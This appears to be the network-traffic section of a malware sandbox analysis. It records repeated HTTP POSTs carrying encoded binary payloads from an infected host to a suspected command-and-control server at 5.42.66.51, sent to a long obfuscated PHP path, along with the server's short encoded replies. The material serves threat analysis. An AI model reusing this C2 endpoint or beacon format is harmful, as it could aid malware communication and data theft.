                                                                                                Oct 11, 2024 20:39:09.498414040 CEST2140OUTData Raw: 5c 5a 43 5c 5a 5e 55 5a 54 57 5b 54 52 5e 57 57 58 51 58 5c 5b 5d 55 5c 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \ZC\Z^UZTW[TR^WWXQX\[]U\_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-0:?>;&U*,Z0?2\!&</U8)> 1S:6=<9"_$,P,/
                                                                                                Oct 11, 2024 20:39:09.841893911 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:09.977333069 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:09 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 13 36 3f 28 04 29 1d 0b 1e 38 3a 2a 09 31 0c 39 06 26 01 23 16 22 2a 33 01 2e 00 0e 0d 25 29 20 05 2b 3f 2a 56 33 01 0a 06 25 2b 2b 5d 0d 10 26 5a 26 30 31 00 3d 3b 3c 1f 2c 2e 2a 1d 27 07 29 07 21 3d 27 51 21 2d 35 5a 25 2f 20 57 31 3d 0f 50 2b 1d 2e 05 38 2c 01 16 31 04 2f 55 0f 11 38 1f 26 2f 24 1c 35 03 24 0d 23 3f 0e 5f 21 3c 3e 5a 37 30 33 5a 25 04 2b 5c 25 3f 32 59 29 0d 2c 0e 29 0b 22 00 32 2a 36 0c 2b 22 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 9896?()8:*19&#"*3.%) +?*V3%++]&Z&01=;<,.*')!='Q!-5Z%/ W1=P+.8,1/U8&/$5$#?_!<>Z703Z%+\%?2Y),)"2*6+""S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                79192.168.2.5500645.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:10.555877924 CEST382OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:39:10.926929951 CEST2552OUTData Raw: 5c 5e 46 5c 5a 5f 55 5c 54 57 5b 54 52 5b 57 53 58 57 58 55 5b 5e 55 56 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \^F\Z_U\TW[TR[WSXWXU[^UV_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.39();:Q>64^$Y1#%;X.3(*!("9=9X)+:"_$,P,7
                                                                                                Oct 11, 2024 20:39:11.748049021 CEST1236OUTData Raw: 35 58 13 2e 3c 3e 3c 3d 3c 5a 24 33 3d 04 17 07 24 23 2d 59 33 07 0d 32 31 3c 13 33 3e 07 1f 05 0e 3d 12 52 36 2f 08 1d 0f 05 23 12 3b 3d 32 2f 07 1b 3e 5c 36 58 30 2e 31 5f 30 27 3b 30 19 28 3a 2e 1a 1c 3f 3c 02 08 37 5b 58 29 3d 3f 31 25 3f 20
                                                                                                Data Ascii: 5X.<><=<Z$3=$#-Y321<3>=R6/#;=2/>\6X0.1_0';0(:.?<7[X)=?1%? ?"&=^6*_1\Y+$!4<9=?=?3A>9>(P>?Y!% 0"35,<=1$]6=7'<?>!,15<1].:^(5[63%--^[0X=>"#,?,\;:]<14%?2>Z<Y00XQ)*>R7>
                                                                                                Oct 11, 2024 20:39:11.969885111 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:11.970293045 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:11.970398903 CEST25INHTTP/1.1 100 Continue


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                80192.168.2.5500655.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:11.976736069 CEST382OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:39:12.334964991 CEST2156OUTData Raw: 5c 58 43 50 5f 5e 55 58 54 57 5b 54 52 5c 57 51 58 52 58 55 5b 5c 55 57 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \XCP_^UXTW[TR\WQXRXU[\UW_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.B09'>+**6#'/:Y"60.07)^!P4.>:*1[:+"_$,P,+
                                                                                                Oct 11, 2024 20:39:12.739557981 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:12.792818069 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:12 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 11 35 59 3f 5d 2a 0a 3e 0c 38 39 29 1e 32 31 26 5e 26 16 27 17 22 3a 1d 05 2d 00 3b 54 32 03 2f 58 3e 02 0f 0e 24 59 23 5e 24 2b 2b 5d 0d 10 26 5e 27 0a 25 02 3e 01 3c 51 2d 3d 26 58 30 2d 36 5b 36 00 3b 53 23 3e 29 17 25 2c 28 56 32 03 39 12 2b 1d 22 01 2c 02 3b 15 32 04 2f 55 0f 11 38 53 26 2f 28 5b 21 5b 3b 57 23 2f 06 1b 20 11 32 5f 37 23 24 03 25 5c 2f 10 26 05 22 5a 2a 30 3c 0d 3e 32 39 1a 27 3a 2e 0d 28 32 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 9895Y?]*>89)21&^&'":-;T2/X>$Y#^$++]&^'%><Q-=&X0-6[6;S#>)%,(V29+",;2/U8S&/([![;W#/ 2_7#$%\/&"Z*0<>29':.(2"S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                81192.168.2.5500665.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:11.976803064 CEST382OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:39:12.335028887 CEST2552OUTData Raw: 5c 59 46 5a 5f 53 55 5d 54 57 5b 54 52 56 57 5d 58 5e 58 5b 5b 55 55 5c 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \YFZ_SU]TW[TRVW]X^X[[UU\_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-3<[>9)Y3.X65#Y/()78=W9=**1/:"_$,P,
                                                                                                Oct 11, 2024 20:39:12.739603043 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:12.792865038 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:12 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                82192.168.2.5500675.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:13.527409077 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:13.873146057 CEST2552OUTData Raw: 59 5d 43 5c 5f 5d 50 5d 54 57 5b 54 52 58 57 55 58 56 58 5b 5b 58 55 59 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y]C\_]P]TW[TRXWUXVX[[XUY_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-'])]"U?6 _02Y"3.#+*9V#8>->!*/.+"_$,P,;
                                                                                                Oct 11, 2024 20:39:14.214337111 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:14.343511105 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:14 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                83192.168.2.5500685.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:13.598022938 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:13.953983068 CEST2156OUTData Raw: 59 5c 43 5b 5f 5d 50 5a 54 57 5b 54 52 59 57 5d 58 56 58 5c 5b 5a 55 5c 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y\C[_]PZTW[TRYW]XVX\[ZU\_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-$)4*(9>6,0?*]6</3*;%Q429=_)1?-"_$,P,
                                                                                                Oct 11, 2024 20:39:14.273142099 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:14.404541016 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:14 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 3a 02 35 59 2f 5e 3e 1d 3d 13 2f 5c 29 1e 25 21 31 04 26 16 0e 06 36 04 3b 04 2e 3e 0d 57 31 29 37 12 3d 02 36 1e 27 01 33 5b 24 3b 2b 5d 0d 10 26 14 30 33 0f 02 29 2b 3f 0c 39 3d 29 03 24 3e 36 5c 36 00 33 16 22 00 29 14 25 2c 27 0b 32 3e 31 55 3f 24 25 5b 38 2c 23 5f 31 04 2f 55 0f 11 38 11 25 2c 3b 07 22 13 09 55 23 01 2b 04 37 59 22 5a 20 0d 27 5d 25 14 3b 12 25 2c 00 1d 28 23 30 0e 3d 22 3a 01 26 04 0f 55 3c 22 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 98:5Y/^>=/\)%!1&6;.>W1)7=6'3[$;+]&03)+?9=)$>6\63")%,'2>1U?$%[8,#_1/U8%,;"U#+7Y"Z ']%;%,(#0=":&U<""S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                84192.168.2.5500695.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:15.176419973 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2128
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:15.529434919 CEST2128OUTData Raw: 5c 5f 43 5a 5f 5b 55 54 54 57 5b 54 52 58 57 52 58 53 58 5a 5b 5d 55 5d 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \_CZ_[UTTW[TRXWRXSXZ[]U]_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.C39 ?;*W>&$"/Z83(+&#=V..%^*1/9"_$,P,;
                                                                                                Oct 11, 2024 20:39:15.868525028 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:16.001415014 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:15 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 5d 21 59 37 14 2a 0a 22 0d 2f 04 2d 57 26 32 25 06 25 38 33 5d 36 04 33 00 2e 10 20 0d 32 14 34 04 2a 3f 31 0c 24 3f 27 5a 30 01 2b 5d 0d 10 25 02 26 20 3e 13 2a 2b 24 51 2e 00 2a 1d 24 00 39 02 21 10 2f 1b 21 3e 07 5f 25 12 30 56 26 13 2a 0e 3f 1a 29 13 38 3f 2f 58 31 04 2f 55 0f 11 38 1c 25 01 38 13 21 04 3f 1f 23 11 2c 58 37 59 3e 59 37 23 34 04 31 04 3f 59 25 02 26 13 2a 0a 30 0b 3d 32 04 01 31 04 07 56 2a 32 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989]!Y7*"/-W&2%%83]63. 24*?1$?'Z0+]%& >*+$Q.*$9!/!>_%0V&*?)8?/X1/U8%8!?#,X7Y>Y7#41?Y%&*0=21V*2"S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                85192.168.2.5500705.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:15.195111990 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:15.544970989 CEST2552OUTData Raw: 59 5f 46 5b 5f 5d 55 5e 54 57 5b 54 52 59 57 56 58 53 58 59 5b 55 55 5e 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y_F[_]U^TW[TRYWVXSXY[UU^_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.A%)0[>;V*<[$<:Z"C</U<>9T7W.[>)27-;"_$,P,
                                                                                                Oct 11, 2024 20:39:15.888916016 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:16.019853115 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:15 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                86192.168.2.5500715.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:16.754615068 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:17.107522011 CEST2156OUTData Raw: 59 59 43 5c 5a 5d 55 54 54 57 5b 54 52 57 57 55 58 53 58 55 5b 5e 55 59 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YYC\Z]UTTW[TRWWUXSXU[^UY_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-39[=>=&'/!63\/?=8T ^5--*"4[.;"_$,P,
                                                                                                Oct 11, 2024 20:39:20.457267046 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:20.591181040 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:20 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 1e 23 2c 20 07 3d 23 22 09 2e 2a 0f 57 25 1c 2d 00 31 06 37 5c 36 04 12 11 2d 58 3b 1d 26 2a 24 02 2a 3f 2a 52 33 59 2f 10 24 01 2b 5d 0d 10 26 5b 24 33 31 02 29 28 28 56 39 2e 39 06 33 00 0c 5a 21 2d 30 09 36 07 29 5e 31 2c 0a 50 31 04 3e 0c 3c 34 39 11 2c 3c 05 58 24 3e 2f 55 0f 11 38 52 32 06 27 02 35 03 01 56 20 3f 34 5d 20 3f 32 5f 34 55 33 11 31 3a 01 1f 32 02 22 59 3e 33 06 0e 3e 0c 29 5f 32 04 39 12 2b 32 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989#, =#".*W%-17\6-X;&*$*?*R3Y/$+]&[$31)((V9.93Z!-06)^1,P1><49,<X$>/U8R2'5V ?4] ?2_4U31:2"Y>3>)_29+2"S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                87192.168.2.5500725.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:16.788711071 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:17.138820887 CEST2552OUTData Raw: 5c 58 43 5c 5a 5d 55 58 54 57 5b 54 52 5a 57 56 58 51 58 5b 5b 55 55 5a 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \XC\Z]UXTW[TRZWVXQX[[UUZ_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.D$4=+))^$%"%\,3=)7.=">8]/;"_$,P,3
                                                                                                Oct 11, 2024 20:39:17.494836092 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:17.628961086 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:17 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0
                                                                                                Oct 11, 2024 20:39:17.910679102 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:17 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                88192.168.2.5500735.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:18.148230076 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:18.507647038 CEST2552OUTData Raw: 59 5b 43 5f 5f 5e 55 55 54 57 5b 54 52 59 57 54 58 53 58 5e 5b 55 55 5c 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y[C__^UUTW[TRYWTXSX^[UU\_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.D$3*8.*<_$?\5%;. +)^9#%."=\-"_$,P,
                                                                                                Oct 11, 2024 20:39:18.909547091 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:19.405081987 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:18 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0
                                                                                                Oct 11, 2024 20:39:19.405371904 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:18 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
